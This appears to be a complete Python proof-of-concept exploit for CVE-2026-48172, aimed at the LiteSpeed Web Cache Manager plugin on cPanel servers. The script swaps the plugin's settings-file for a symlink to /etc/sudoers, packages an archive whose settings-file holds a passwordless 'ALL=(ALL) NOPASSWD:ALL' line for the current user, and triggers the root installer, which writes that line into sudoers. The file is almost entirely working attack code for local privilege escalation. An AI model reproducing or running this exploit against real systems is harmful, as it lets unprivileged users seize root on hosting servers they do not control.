#!/usr/bin/env python3 # CVE-2026-48172 PoC exploit by HORKimhab import os import subprocess import tarfile import tempfile from pathlib import Path # === Config === PLUGIN_PATH = Path("/usr/local/cpanel/base/3rdparty/ls_web_cache_mgr") SETTINGS_FILE = PLUGIN_PATH / "settings-file" PACKAGE_DIR = Path("/usr/src") PACKAGE_NAME = "ls_web_cache_mgr.tar.gz" INSTALLER_SCRIPT = Path("/usr/local/lsws/admin/misc/pluginmgr/install-cpanel-plugin") def check_prereqs(): if not PLUGIN_PATH.exists(): raise FileNotFoundError(f"Plugin path not found: {PLUGIN_PATH}") if not INSTALLER_SCRIPT.exists(): raise FileNotFoundError(f"Installer script not found: {INSTALLER_SCRIPT}") def build_malicious_package(username: str, output_file: Path): with tempfile.TemporaryDirectory() as tmpdir: pkg_root = Path(tmpdir) / "ls_web_cache_mgr" pkg_root.mkdir(parents=True) payload = pkg_root / "settings-file" payload.write_text(f"{username} ALL=(ALL) NOPASSWD:ALL\n") with tarfile.open(output_file, "w:gz") as tar: tar.add(pkg_root, arcname="ls_web_cache_mgr") def exploit(): user = os.getenv("USER") or subprocess.check_output(["whoami"]).decode().strip() print(f"[+] Current user: {user}") check_prereqs() print("[+] Replacing settings-file with symlink to /etc/sudoers...") if SETTINGS_FILE.exists() or SETTINGS_FILE.is_symlink(): SETTINGS_FILE.unlink() SETTINGS_FILE.symlink_to("/etc/sudoers") malicious_archive = PACKAGE_DIR / PACKAGE_NAME print(f"[+] Building malicious archive at {malicious_archive}") build_malicious_package(user, malicious_archive) print("[+] Triggering installer script...") subprocess.run([str(INSTALLER_SCRIPT)], check=True) print("[+] Exploit complete. Verify sudoers:") print(f" grep {user} /etc/sudoers") if __name__ == "__main__": exploit()